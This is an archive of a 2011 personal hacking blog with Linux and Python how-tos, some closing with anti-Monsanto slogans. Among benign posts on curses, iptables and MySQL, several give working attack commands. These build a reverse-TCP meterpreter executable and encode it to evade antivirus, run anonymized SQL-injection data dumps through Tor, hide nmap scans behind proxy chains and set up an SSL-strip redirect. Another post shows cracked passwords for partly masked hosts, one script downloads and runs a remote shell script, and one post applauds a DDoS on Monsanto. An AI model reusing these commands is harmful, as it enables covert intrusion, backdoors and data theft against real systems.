Friday, November 4, 2011
Simple Python Portscan Function
Here's a basic portscan function written in python - http://pastebin.com/v6ntptfT
Thursday, November 3, 2011
Python Curses Example / Tutorial
I wanted to make a small example tutorial on getting started with a curses UI in python. We'll get started by creating our screen and adding a simple string;
import curses
screen = curses.initscr() # Creates our screen
curses.noecho() # Keeps the keys we press from
curses.cbreak() # Takes input right away
screen.keypad(1)
screen.addstr(10,0,"Resist Monsanto!") # Add a string at 10,0
screen.refresh() # Refresh screen now that strings added
# While loop to wait for key events, then
while 1:
key = screen.getch() # Get presse keys
if key == ord("q"): break
curses.endwin() # Closes curses environment
This should result in a screen with the string "Resist Monsanto" in it. If we wanted to use colors we can create color pairs to use like so:
First we initiate the color scheme and than we will create a color pair;
curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK) # Creates a color pair as 1 with foreground cyan and background black
We can now use this color pair when adding a string for example;
This would result in the following script - http://pastebin.com/0EU7UKqZ
But lets say we wanted to get user input rather than just the key event and create a variable out of it, in this case we would use curses.getstr() function. Here we'll create a simple function to get our input called command().
def command():
curses.echo() # Allows out input to be echo'd to the screen
cmd = screen.getstr(0,1,15) # Creates an "input box" at the location (0,1) with an input buffer of 15
def command(): # Press "c" to start user input
curses.echo() # Allows out input to be echo'd to the screen
cmd = screen.getstr(0,1,15) # Creates an "input box" at the location (0,1) with an input buffer of 15 charscurses.noecho() # Turns echo back off
screen.addstr(2,0,cmd,curses.color_pair(2)) # Adds users input
This would result in the following - http://pastebin.com/zVzrGz0n
Thursday, October 27, 2011
Python Script for Monitoring a site to see whether it's up or down
Quick script I coded to save me time checking to see if a site was down, so I wrote this script to do it for me and to send me an alert using "libnotify-bin" if it happens to go down.
Two methods are available, Ping and HTTP Requests.
If I decide to add more methods, or add more sites to the HTTP request (to insure accuracy) than I'll post an update.. until then I hope you find this useful!
Monday, October 24, 2011
Python Script to Parse Files for MD5 Hashes
This script demonstrates basic usage of regular expressions in order to look for MD5's (AKA [0-9a-f]{32}) and write them to an output file.
Usage :
Python # python md5parser.py SomeFile.txt MD5list
File parsed ~ 6 hashes found.
Python # cat MD5list
aad3b435b51404eeaad3b435b51404ee
9a5760252b7455deaad3b435b51404ee
0d7f1f2bdeac6e574d6e18ca85fb58a7
9a5760252b7455deaad3b435b51404ee
0d7f1f2bdeac6e574d6e18ca85fb58a7
098f6bcd4621d373cade4e832627b4f6
Script: http://pastebin.com/PPnDs6AU
Python script to parse medusa logs and check if hosts are alive
As the title says, this is a script to parse medusa logs to in order to check if the host is alive, if it's been cracked then it will also display the password for the hosts service that specified when using medusa. Handy for parsing large medusa logs to see who's up.
Ex.
Checking for live hosts.
220.XX3.1XX.20 is down...
83.XXX.1X9.246 is up!
Password:r00t3d
186.X2.X5.X is down...
190.XXX.37.XX4 is up!
Password:qwerty
79.1XX.XX9.166 is down...
216.XXX.1X9.106 is up!
Password:L4M3R
89.XXX.13X.39 is down...
136.XX9.XXX.106 is down...
31.44.137.109 is down...
15X.5X.70.X is down...
189.10X.175.X74 is down...
208.124.56.2X9 is down...
129.X3.1X2.1X5 is down...
X8.4X.39.XXX is up!
Password:[SUCCESS]
XXX.114.1X0.202 is down...
X2.91.XX.1 is up!
Password:123456
...
You can find the script below;
http://pastebin.com/QUUV39KU
Python script to look up all the sites hosted on given IP/URL
Here's a script you can use to find out all the domains hosted on the given IP/URL. Takes a command line argument as you can see in the code;
Python # python sharedhosts.py www.monsanto.in
33 sites hosted on IP Address 184.22.117.180
\_________________________________________/
/
http://www.outboards.cn
http://www.sieunhandienquang.com
http://www.medhelp.in
http://www.alibre.cn
http://www.doppelstock.net
http://www.sexhuflit.com
...
I cut the list down to save space, you can find the script below;
http://pastebin.com/BzypB63Q
Monday, October 17, 2011
Python script to parse syslog/audit.log for ssh activity.
I wrote this quick script to parse through my audit log for ssh login attempts and than decided to make it usable on my ubuntu-based box too. Below you can find the source code;
logmon.py
sshmon.py
http://pastebin.com/ehkm5syXFind out which linux version you're running.
Here I will show you a few ways to find out which version of linux you're running, which may come in handy when writing scripts or something of that sort.
uname -a
cat /proc/version
dmesg | grep "Linux version"
You can also find out which distribution release it is like so;
cat /etc/*-release
Saturday, October 8, 2011
Making command alias's to shorten long commands.
I haven't posted in a while, but I wanted to make a quick post on how to make an alias for long commands to reduce your typing.
For example, if I often had to perform MITM attacks during assessments/pentests than I may want to make an alias for the iptables rules. To do this I can create the following alias like so;
alias sslrule='iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000'
alias rules='echo -e "\033[1;41;1mNAT Rules";iptables -t nat -L -nv;echo -e "\033[1;44;1mPlain Rules";iptables -L -nv;echo -e "\033[0m"'
alias rules='echo -e "\033[1;41;1mNAT Rules";iptables -t nat -L -nv;echo -e "\033[1;44;1mPlain Rules";iptables -L -nv;echo -e "\033[0m"'
Now instead of typing out that long rule you can just type sslrule, and to see the rules in a distinctive manner I can just type rules.
Now this isn't a permanent alias, if we want to make a permanent alias than we'll need to edit our .bashrc file and add the alias there. In my case it will be located in /root/.bashrc. From there you can just append the alias's of your choice below the existing ones and you'll now have a permanent alias to save you some typing (and carpal tunnel).
Friday, September 9, 2011
Mounting a windows partition
This is a quite "how-to" on mounting a partition in GNU/Linux. First we need to identify which partition we want to mount. To do this we'll issue the fdisk command;
~ # fdisk -l
Device Boot Start End Blocks Id System
/dev/sda1 * 1 192 1536000 27 Unknown
/dev/sda2 192 7734 60579043+ 7 HPFS/NTFS <----
/dev/sda3 29333 30402 8586240 17 Hidden HPFS/NTFS
/dev/sda4 7734 29333 173495297 5 Extended
/dev/sda5 28962 29333 2976768 82 Linux swap / Solaris
/dev/sda6 28591 28962 2972672 82 Linux swap / Solaris
/dev/sda7 18273 18496 1798144 82 Linux swap / Solaris
/dev/sda8 7734 18273 84653056 83 Linux
Now we want to create a directory in our /media/ directory which is where we'll mount the windows partition.
Now we're reading to mount it in the directory we just created.
mount -t ntfs -o nls=utf8,umask=0222 /dev/sda2 /media/Winblows
That should successfully mount your windows ntfs partition in the directory we created, hope this helps!
~ # fdisk -l
This lists the partitions, we're looking for a partition that has NTFS under the system column.
/dev/sda1 * 1 192 1536000 27 Unknown
/dev/sda2 192 7734 60579043+ 7 HPFS/NTFS <----
/dev/sda3 29333 30402 8586240 17 Hidden HPFS/NTFS
/dev/sda4 7734 29333 173495297 5 Extended
/dev/sda5 28962 29333 2976768 82 Linux swap / Solaris
/dev/sda6 28591 28962 2972672 82 Linux swap / Solaris
/dev/sda7 18273 18496 1798144 82 Linux swap / Solaris
/dev/sda8 7734 18273 84653056 83 Linux
Now we want to create a directory in our /media/ directory which is where we'll mount the windows partition.
mkdir -p /media/Winblows
VNC Weak Password Bash Scanner
This is an old bash script I wrote some time ago, it uses the .jar that I coded a while back to parse nmap logs for IP's. You can find the bash script at the following pastebin and the jar used to parse the nmap logs below that.
Jar - http://hakhub.blogspot.com/2011/05/bash-scripting-friendly-java-ip-parser.html
Friday, August 26, 2011
Python and Shell Commands (Popen) example
Well I've recently moved back to python after learning PHP/MySQL for a while, so as I learned I coded a small program to issue remote commands. It essentially opens a given socket and waits for a connection, when a connection is established it prompts the user for validation. If validation is successful it passes a shell (limited to /bin tools) which you can use to issue remote commands. It also adds an iptables firewall rule to accept all packets on the port you specified which it then deletes when you exit the shell. All activity is logged to Logfile.log, including failed login attempts and their IP.
Things you can learn from this script:
User Validation using the hashlib and a sha512'd password
Command line arguments
Popen shell commands
Popen shell commands
Reading/Writing Files
Host:
~$ python recon.py 1984
~$ nc -vv 19.84.20.11 1984
Basic sockets
I wrote another small script to connect to the host, but in the end I decided to just use netcat instead. Example usage;
Host:
Client:
~$ nc -vv 19.84.20.11 1984
Script - http://pastebin.com/Mx600RA8
Getting started with iptables
Okay so I have probably talked about iptables before, and used it in previous tutorials, but now I've decided to talk about it in particular. iptables is extremely useful and powerful if configured properly. We'll start off with a very basic rule, allowing all traffic to and from telnet.
iptables -A INPUT -p tcp --destination-port 23 -j ACCEPT
Now we should be allowing all connections on port 23 (telnet).
We can view the rules we have like so;
iptables -L
If we had wanted to list the table with numeric values instead, use the (-n) flag. In addition, we can specify what rules we want to list (INPUT, OUTPUT, etc) and increase the verbosity to see the packet and byte statistics.
iptables -L INPUT -n -v
Now, that's nice and all but I'd like to filter out SSH on this laptop to drop any packets coming from IP's other than mine. In order to do this, I would issue the following command.
Now everyone but my home network can ssh into this box.
If we wanted to "flush" our chain, we can issue the following command;
iptables -F
That will have removed all the rules in the chain.
Another nice feature of iptables is the ability to redirect traffic to another port, so for example if we issued the following command than we would be redirecting the unwanted traffic from SSH to our honeypot's port.
iptables -t nat -A PREROUTING -p tcp --dport 22 ! -s 19.84.20.11 -j REDIRECT --to-port 1984
Now, nat rules are located in a separate are than you average rules. If we wanted to view these rules than we would need to explicitly specify that it's the nat rules we want to see or modify. For example, to view the rules and then flush them we would issue the following;
iptables -t nat -L -nv
iptables -t nat -F
That about wraps it up for my "how to" on getting started with iptables. Hope this helps someone else out there.
Thursday, August 18, 2011
Simple PHP Toolkit
Well I've been learning PHP/MySQL lately so while learning I decided to make something of use (well... kind of). But I've decided to move to python for my web development, so I decided to just post what I've coded so far for others to play with and learn from. If uses a MySQL DBase to login, which you can set up using that queries in my previous post on the hash cracker.
What it has;
Malware String Detector (looks through files for specific strings, which you can specify - I used it for looking through keyloggers for email credentials)
Basic Port Scanner
MD5 Hash Generator/Cracker
Below you can find the tar'd files.
PHP Scripts - http://www.mediafire.com/?g1iwudpkic5vip4
Images - http://www.mediafire.com/?7v2q2r469dn6mie
Wednesday, August 10, 2011
Windows Command Line/Console Alternative
Well I'm a linux guy, therefore I've come to love the CLI...which is unfortunately lacking on windows. I've had a stock windows starter install on this netbook I've been dual booting with and decided to play more with windows and do some malware analysis. I can't stand dealing with microsofts CLI, so I decided to look for an alternative... and I found exactly what I was looking for. "Console" is a Windows console window enhancement.
Console features
include: multiple tabs, text editor-like text selection, different
background types, alpha and color-key transparency, configurable font,
different window style.
This is a very nice addition for anyone who loves the CLI, and it really helps in customizing windows to suite me which makes for a more pleasant experience.
You can find the download here, on sourceforge.
http://sourceforge.net/projects/console/
Sunday, August 7, 2011
Basic PHP Hash Cracker (Updated)
Well I've previously posted the basic hash cracker I had coded in PHP, but it seems the links had died and since I've added MySQL Database functionality I decided I would just make an updated post with both of them and their sources.
To download the original one which doesn't use a SQL DBase and works on free hosting, use this version.
To
download the latest version which stores cracked hashes and hashed
words in a DBase which it then utilizes when cracking hashes by trying
all the plaintext words in the DBase against the hash. You can download
that version here.
To setup the MySQL Database, open up your MySQL shell and issue the following sql queries. (If you need help to get started with setting up a web server / using the MySQL shell than check out this post)
~$ mysql -u root -p
mysql> create database HashCracker;
mysql> create table HashCracker.users(UID int not null auto_increment,User varchar(50),Pass varchar(42),primary key(UID));
mysql> create table HashCracker.Hashes(HID int not null auto_increment,String varchar(50),Hash varchar(32),primary key(HID));
mysql> insert into HashCracker.users(User,Pass) values('Username',sha1('Password'));
Now your MySQL DBase should be all setup and ready for use. Just extract the contents of the tar into your /var/www
directory (or whatever your webroot directory is) and log in with the
credentials you specified in the query above. If you have any comments
feel free to leave them.
Friday, August 5, 2011
Monitor Turns Off After A Few Seconds (FIX)
Well I had this old flat panel radius lying around just taking up room which I thought was broken, but I had given someone an old system including an old monitor from the 90's which I decided wasn't sufficient. I had decided to pull it out and take it apart to see what exactly was wrong as it would turn on and show the desktop for a brief second and then go black. I'm not much of a hardware guy, but lately I've been playing around with things salvaged from my former job. I fixed a brand new 7-in-1 Kodak printer/everything else you can imagine, which they tossed out because they thought it was broken. I also grabbed all the flat panels they were tossing out, and this radius was one of them. After doing some reading I realized this was a good sign the capacitors are dying, and the (temporary) fix didn't require any soldering. I was able to use it by simply turning the brightness down with the few seconds I had to navigate the menu with, then once I turned the monitor on again it had enough energy to stay on, at some point I may have to replace them, but I'm sure I have something lying around I can salvage some from.
Also using a higher power supply pack made it usable regardless of brightness or contrast, but switching out the compacitor will eventually need to be done I expect.
Also using a higher power supply pack made it usable regardless of brightness or contrast, but switching out the compacitor will eventually need to be done I expect.
Thursday, July 14, 2011
Find out your hardware information in linux
This is very basic, but I hadn't known about it untill recently when I was given an old pc which I instantly install linux on. I don't do much when it comes to hardware as I can't really afford to... other than other peoples stuff I recycle. The quick way to find out all your hardware specs on linux is "lshw". Turns out it had a 3.00 GHz CPU with a 512mb stick of ram and 3 open slots, which I just so happen to have 3 spare 512mb sticks laying around from other pcs I've recycled. So I ended up with a fully functional 3.00GHz CPU 2GB ram linux box, which made me more than happy... as I can't afford much.
Friday, July 8, 2011
Getting started with skipfish.
Well this is another great vulnerability scanner for webapp's, I really like it so far and thought it was well worth a post. So to start off, download skipfish from here. It has a great interface and outputs the results to an HTML file.
To find out more about the tool and the huge number of probes it performs, read their documentation here.
Now assuming you've downloaded the package from the link above, we will need to untar it and compile it with the make command.
~$ tar -xvzf skipfish-2.02b.tgz
~$ cd ./skipfish-2.02b
~/skipfish-2.02b $ make
Now it should have compiled, but if you get an error along the lines of this;
make: cc: Command not found
make: *** [skipfish] Error 127
Then you may need to install GCC, you also will need libidn installed.
Now assuming we have it all compiled and ready to go, you should have file called "skipfish" in the current directory. You will have to either specify the worldlist you'd like skipfish to use or copy one from the dictionaries directory into the directory that has skipfish in it.
I'll be specifying one of the dictionaries that come with this tool.
Let's assume we're auditing this blog, we would issue the following command.
That'll get skipfish scanning, you can watch the process via the CLI and the results will be stored in the "outputdir" you specified. So you can view the results in your browser of choice.
~/skipfish-2.02b $ cd
~$ cd ./outputdir
~/outputdir $ firefox index.html
From there, you can analyze the results and perform your audit or fix your code.
Sunday, July 3, 2011
Getting started with MySQL Shell
Okay so I've just recently started getting into a web dev and what not, but I thought I'd make a quick how-to for getting started with MySQL on the linux platform.
First off, make sure you've got a LAMP setup (Linux Apache MySQL & PHP). If you're using a debian based distro you can download them with the repositories like so;
sudo apt-get install apache2 mysql-server apache-mod-php5 php5-mysql
After those install, you'll want to set a password for your MySQL account (MySQL SHOULD be running, but it can be started like so; /etc/init.d/mysql start).
Now you should set your password set, you can login to MySQL and get to the fun stuff.
mysql -u root -p
You'll be prompted for your pass, after you log in you can start interacting with the DBase.
/*
Alternatively you can log in without a password, as there is none by default. then could could issue the query like this;
mysql -u root
mysql> SET PASSWORD FOR 'root'@'localhost' = PASSWORD('Yourpassword');
*/
If for wanted to view the existing DBases you can issue the following command;
mysql> show databases;
Now to create a DBase you can simply do this;
mysql> create database MonsantosArsenal;
Now if we wanted to move to that DBase we could do the following;
mysql> use MonsantosArsenal;
Now, what's a DBase without tables?
mysql> create table Weapons(
WepID int,
Weapon varchar(50)
);
And that'll create a table named Weapons in the Database MonsantosArsenal. You can now begin adding columns with the insert command, but first I want to point out that you can set a integer to automatically increment by 1 like this;
mysql> create table Weapons(
mysql> create table Weapons(
WepID int not null auto_increment,
Weapon varchar(50)
);mysql> insert into MonsantosArsenal (Weapon)
VALUES("Genetically modified food");
You now have a table with a column named "Weapon" that has the value we chose to insert. I hope this helps get you started with the mysql shell.
Anonymizing SQL Injections
So I've previously made posts about things like tor and sqlmap, but I just wanted to make this quick post to show that you can combine the two in order to increase anonymity when doing pentests or what have you. So assuming you have TOR up and running with default settings, if not you can find a how-to here, we will use sqlmap's --tor flag.
python sqlmap.py -u www.example.com/fuckmonsanto.php?prodID=23 --beep --eta --tor --dump-all
or if you're not using TOR or simply having issues, you can use the proxy flag instead. I'll be using polipo, which is utilizing tor, so I will be using my localhost and port 8123 which is the default port used by polipo. You could alternatively use a proxy off the web.
sqlmap -u www.example.com/fuckmonsanto.php?prodID=23 --beep --eta --proxy=http://127.0.0.1:8123 --dump-all
It's sadly as simply as that.
Saturday, July 2, 2011
"Linux: can't open /dev/dsp" Festival FIX
Well I've had no problems with festival on my netbook, but when I tried to used it on my desktop I got the error "Linux: can't open /dev/dsp". It seems this is due to the fact that festival uses outdated OSS emulation, to fix this problem just issue the following command;
printf ";use ALSA\n(Parameter.set 'Audio_Method 'Audio_Command)\n(Parameter.set 'Audio_Command \"aplay -q -c 1 -t raw -f s16 -r \$SR \$FILE\")\n" > .festivalrc
Now you can test to check whether it's working or not.
echo "Resist Monsanto" | festival --tts
Monday, June 27, 2011
Basic PHP Hash Cracker
Well, I've moved from Java to C++ untill I had got more interested in web security... which led me to stray away from C++ and learn some web dev. Right now I'm learning PHP, and in the process made this simple hash cracker. Below you can find the source and a very basic dictionary ( Approx. 19mb), for testing purposes. You can check out the working version hosted here, if I make and updates to it (such as supplying a hash list instead of a single hash) than I'll update this page or make a new post.
Source
Example
Source
Example
Tuesday, June 21, 2011
Java MD5 parser
Well, I don't code in Java much anymore but I had encountered a task which involved isolating MD5 hash's from a rather large text file, which would have been a pain in the ass to do manually. In addition, I tried awk, grep and sed a bit. They all worked to a lesser degree, but not quite what I was looking for. So I remembered the Java IP parser I coded for parsing nmap logs and pulling the IPs, so I just altered the regex to pull MD5's instead and write them to a file rather than IPs. So because I found it rather helpful, I decided to make a quick post and link the new source and jar file.
I think sed could have actually done the job but I wasn't having any luck and this alternative was extremely easy and quick. Plus it does exactly what I needed.
Source - http://pastebin.com/YhS7J4bC
Usage;
Saturday, June 18, 2011
Adding fluxbox styles.
I've had a few people ask me how to change their fluxbox theme, so I've decided to make a quick how-to on adding styles, which is very easy.
First off, know your fluxbox styles are stored in "/usr/shares/fluxbox/styles"
So all you have to do is download your theme of choice and extract it into the themes folder. Now the new style should be listed in the fluxbox settings.
Compiling skipfish and fixing errors.
iWell, this is the second time I'm writing this... so this one will be a bit more brief, I had encountered some issues when installing the latest version of skipfish on my desktop, one involving "idna.h" and the other a whole plethora of ssl related issues. With some googling I solved the issue, so I've decided to make a quick post to help others who want to install this tool or have encountered the same error as I had.
These two issues I had could be solved by downloading the following packages, but we will want to update first of course.
sudo apt-get update
sudo apt-get install libssl-dev && sudo apt-get install libidn11-dev
Now we will proceed on to downloading the source for those who have just come across this to compile it, or whatever the case may be.
wget http://skipfish.googlecode.com/files/skipfish-1.94b.tgz
tar -xvzf skipfish-1.94b.tgz
cd ./skipfish-1.94b
make
Now you should have successfully compiled yourself a working skipfish binary which can be used like so;
./skipfish -h
Friday, June 17, 2011
Find a file and its directory in linux
Okay this is a quick tip, which a lot of you guys probably know, but I forgot about it untill just now. I always find myself in a situation where I need to find a files location but can't seem to locate it, at which point I resort to google. But a quicker and easier way to do this is the "whereis" command.
conky: /usr/bin/conky /etc/conky /usr/lib/conky /usr/share/man/man1/conky.1.gz
Alternatively you could use the find command.
~ # find / -iname conky
/etc/conky
/usr/bin/conky
/usr/share/doc/conky
/usr/lib/conky
Monday, June 13, 2011
Anonymous nmap scans
This is an extremely simple tutorial on how you can use "proxychains" to anonymize your nmap scans, or to trip the IDS/Firewalls with multiple IPs to mask which one you really are. First, proceed to the following link to download the proxychains package.
http://prdownloads.sourceforge.net/proxychains/proxychains-3.1.tar.gz?download
Now we need to extract it's contents with the "tar" command so that we can configure it and compile it.
~ $ tar -xvzf proxychains-3.1.tar.gz
That will extract it to your root directory, now we will "cd" into that directory and configure it, then compile it.
./configure
make install
Now you'll have proxychains configured for you system and have compiled a binary. Before you can use it you must configure it, unless you're using tor, which is it's default setting - socks5 127.0.0.1 9050.
nano proxychains.conf
At this point you will want to scroll down to the bottom of the file, which is where you will configure which proxies and what type they are. You can find proxies at one of the following links at the bottom of this site.
For example the default should look like this;
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
So, if you're using tor than you can just leave it, or add more proxies in the chain. Say I wanted to add an http proxy to the chain, I would edit the config file like so.
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
So, if you're using tor than you can just leave it, or add more proxies in the chain. Say I wanted to add an http proxy to the chain, I would edit the config file like so.
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
http 189.47.194.196 8080
Now, you're ready to use it. You can run a tool through proxychains like this;
And that about wraps it up for this quick how-to on anonymizing nmap scans.
./proxychains nmap 199.66.1.11
And that about wraps it up for this quick how-to on anonymizing nmap scans.
Sunday, June 12, 2011
Anonymous targets Monsanto
Well, it looks like Monsanto was recently in anons scope, being hit with a DDoS that was said to have lasted over 60 hours. There was also vulnerabilities found such as SQLi on their foreign sites though their focus seemed to have been on DoSing monsanto.com
As I write this, their site still remains to be down due to the Dos anon was so nice as to supply. It seems even anon realizes monsanto is a terrible corporation whose main goal is complete control of the food supply. As Henry Kissinger once said, "If you control the oil you control the country; if you control food, you control the people."
I really hope the population wakes up and gets a grip on reality, rather than this material illusion the general publics subcumb to.
I'm glad the hacking community takes notice of Monsanto and their dirty ways, rather the cracking a tin foil hat joke while stuffing their face with genetically modified chips covered in MSG and watching television.
As I write this, their site still remains to be down due to the Dos anon was so nice as to supply. It seems even anon realizes monsanto is a terrible corporation whose main goal is complete control of the food supply. As Henry Kissinger once said, "If you control the oil you control the country; if you control food, you control the people."
I really hope the population wakes up and gets a grip on reality, rather than this material illusion the general publics subcumb to.
I'm glad the hacking community takes notice of Monsanto and their dirty ways, rather the cracking a tin foil hat joke while stuffing their face with genetically modified chips covered in MSG and watching television.
Saturday, June 4, 2011
Notify-Send - On Screen text display
To start off, download the following package with your repositories;
apt-get install libnotify-bin
After that you can test it like so;
notify-send "Resist Monsanto"
That will create a popup on your screen displaying the text you entered.
Though that's a big jumbled up on this netbook, so I'm going to pipe it to awk to shorten it a bit and just display what I want to see.
So now that will show me whos logged onto this system and what they're currently doing. I could have this process automated with a while loop in order to have some desired notification displayed to me every however amount of minutes I've chosen. For example;
That would create a pop-up every 10 seconds showing me who's logged on and what they're currently doing. If we wanted something a big longer than a few seconds than you can add a "m" in the sleep command we issued to make it 10 minutes instead.
You can also alter the amount of time the popup is displayed by specifying a time in milliseconds that you'd like it to be displayed before expiring.
notify-send -t 5 "` w | awk '{print $1 " -> " $8}'`"
Another feature of notify-send is the ability to display icons, and a title. This is demonstrated below;
notify-send "Monsanto" "Genetically Modifying People Near YOU" -i /usr/share/pixmaps/terminator.xpm -t 5000
You may not have that icon if you don't have the terminal emulator "terminator" in which case I highly suggest giving a try. It's by far my favorite terminal.
Now that just about covers this brief "how-to" on notify-send, and as you can see there's quite a few things this tool can be used for. I'm sure you'll think of plenty of your own ideas. Feel free to share the things you use notify-send for, and maybe share your own scripts and ideas.
Bypassing Anti-Virus with msfencode.
Well I had recently posted about msfpayload and how to generate a backdoored exe using it. What I left out was msfencode, which is extremely useful because the "unpacked" executable is very likely to be detected by most Anti-Virus. You can find my previous post here.
Now this will pipe the payload to msfecode to be passed through the packer 5 times (-c specifies the amount of times to pass it through the encoder) and it will use the polymorphic xor encryption "shikata ga nai" and output the backdoor as "FuckMonsanto.exe"
You can fire up the handler in metasploit the same way as before, but I would like to add in the fact that you can run things as a "job" which will run in the background by using the "-j" option.
Now lets take what we learned from the last post and pipe the msfpayload command to msfencode.
~ $ msfpayload windows/meterpreter/reverse_tcp LHOST=19.84.20.11 LPORT=3030 R | msfencode -e x86/shikata_ga_nai -t exe -c 5 -o FuckMonsanto.exe
msf> use exploit/multi/handler
msf exploit(Handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(Handler) > set LHOST=19.84.20.11
msf exploit(Handler) > set LPORT=3030
msf exploit(Handler) > exploit -j
Now you can continue with your pentest while the handler runs in the background and waits for connections, at which point you can use the job command to see/interact with the jobs running in the background.
Now you can continue with your pentest while the handler runs in the background and waits for connections, at which point you can use the job command to see/interact with the jobs running in the background.
Sunday, May 29, 2011
Installing TOR manually - Debian / BT5
This will be a quick how-to on install tor manually in BT5. First, add the tor repositories to your sources.list like so;
nano /etc/apt/sources.list
cat /etc/debian_version
Now you know what version of debian you're running, replace the <Distro> with that version.
deb http://deb.torproject.org/torproject.org <Distro> main
Save that with "ctrl-o" and then proceed to add the "GNU Privacy Guard" keys that are used to sign the tor packages;
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
Now update your system and install the tor packages.
apt-get update
apt-get install tor tor-geoipdb
Now tor's installed, you can move on to installing polipo and the GUI vidalia.
SIPVicious Usage
Well I was going to go and make a quick SIPVicious demo, but there's this video which was a good demo on what these scripts are capable of doing. So instead of making another video, I'll just embed his as it's a good tutorial.
SIPVicious - SIP/VOIP Auiditing Suite
SIPVicious suite is a set of tools that can be used to audit SIP based VoIP systems. It currently consists of four tools:
- svmap - this is a sip scanner. Lists SIP devices found on an IP range
- svwar - identifies active extensions on a PBX
- svcrack - an online password cracker for SIP PBX
- svreport - manages sessions and exports reports to various formats
- svcrash - attempts to stop unauthorized svwar and svcrack scans
Friday, May 20, 2011
Using pipelines to pipe data.
Well this is a simple concept, but it's usefulness has no limits. It's the ability to pipe data output from one command into another. For example, I can use the use the "ip addr" command combined with grep to only display the lines containing the inet addresses.
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
inet 10.0.0.3/24 brd 192.168.1.255 scope global eth0
inet6 fe80::217:31ff:feda:9814/64 scope link
You could pipe that data along further to awk, then select specific data out of it to be displayed. For example;
~ $ ip addr | grep inet | awk '{print $2 ":" $4}'
127.0.0.1/8:host
::1/128:host
192.168.1.102/24:192.168.1.255
fe80::217:31ff:feda:9814/64:link
Or another example could involve that simple java ip parser I made, while using it I noticed that alot of scans had duplicate ips, which could cause you to waste valuable time running tools against the same IP multiple times. I haven't been playing much with Java lately, so I decided to just fix the problem in a bash script with the use of the "uniq" command. This is the command the script uses to remove duplicate IP's from the IP list.
java -jar ips.jar nlog | uniq > iplist.txt
You can find that Java parser here.
Tuesday, May 17, 2011
Using wget to download ftp files
This is a quick example of how you can use wget to download more then just html files, in this case we will download a shell script off our ftp server and then execute it.
#! /bin/sh
echo -e "\033[1;32;1mAttempting to destroy monsanto before they contaminate the planet with hazardous GMO's"
wget --ftp-user Pathogen --ftp-password hakhub ftp://ftp.drivehq.com:21/DestroyMonsanto.sh
chmod 755 DestroyMonsanto.sh
./DestroyMonsanto.sh
echo "Too late"Monday, May 16, 2011
BT5 was released.
Incase you guys haven't heard for some reason, BackTrack5 has been released. I'm really enjoying, probably my favorite one so far. GUI is nice, and the tools are great as always. Download it from here;
http://www.backtrack-linux.org/downloads/
Getting started with Armitage
Well I've never bothered playing with armitage before, but I figured what the hell. I decided to post a quick how-to on getting it fired up for the first time. First, make sure you're all up to date, then use your repositories to install armitage.
apt-get update
apt-get armitage
then we will have to fire up metasploits rpc deamon, as that's what armitage uses to interact with the metasploit framework.
msfrpcd -f -U msf -P test -t Basic
now make sure mysql is up and running;
/etc/init.d/mysql start
Now, make sure you're in armitage's directory and run the shell script "armitage.sh". For BT4 (BT5 is out) you would be issuing these commands.
cd /pentest/exploits/armitage
armitage.shNow, seeing as we set the user as "msf" and the password as "pass" with the msfrpcd command, we can just hit "connect". That should have done it, if all's well you see something like this;
Sunday, May 15, 2011
Creating an executable payload via msfpayload.
We'll be making a quick tutorial on how to create an executable using a metasploit payload. We will use a meterpreter payload, here's the command we would want to issue to create an ".exe".
msfpayload windows/meterpreter/reverse_tcp LHOST=19.84.20.11 LPORT=31337 X > /root/Shiny.exe
You can then verify it was created by using the "file" command, like so;
file /root/Shiny.exe
And it should say something along the lines of this;
/root/Shiny.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
You now have a working payload in the form of an exe, you can now fire up metasploit and use the exploit handler to listen for the incomming connections. Assuming we are in the the metasploit console, we would issue the following commands;
msf> use exploit/multi/handler
msf exploit(Handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(Handler) > set LHOST=19.84.20.11
msf exploit(Handler) > set LPORT=31337
msf exploit(Handler) > exploit
You now have a handler waiting for incoming connections from those who run your meterpreter payload.
Saturday, May 14, 2011
Using colors in bash scripts with ANSI/TV100 codes.
Well, I've made a few posts related to bash scripting so I though I'd make a quick post showing how you can add some color to your scripts. We will be using ANSI, here's a quick example of how to use it;
echo -e "Hey look at \033[1;32;1m this color, we'll make the rest of the script blue \033[0;34;1m"
nmap 127.0.0.1
Make sure you remember the "-e", which enables the interpretation of backslash escapes so it will actually except the ANSI code rather than printing it out like a normal string.
Console Color chart
Black 0;30 Dark Gray 1;30 Blue 0;34 Light Blue 1;34 Green 0;32 Light Green 1;32 Cyan 0;36 Light Cyan 1;36 Red 0;31 Light Red 1;31 Purple 0;35 Light Purple 1;35 Brown 0;33 Yellow 1;33 Light Gray 0;37 White 1;37
Backgrounds
40 Black41 Red
42 Green
43 Yellow
44 Blue
45 Magenta
46 Cyan
47 White
You can also add other attributes such as using underlined or bold/bright text by changing the last digit in the code, just before the "m". For example, to use the underline attribute I would do this;
echo -e "Hey look at \033[1;32;1m this color, we'll make the rest of the script blueish \033[0;34;4m"
echo -e "This is underlined\033[0m this is not"
Some Useful Attribute Codes
0m = Reset all attributes.
1m = Set the "bright" attribute.
2m = Set the "dim" attribute.
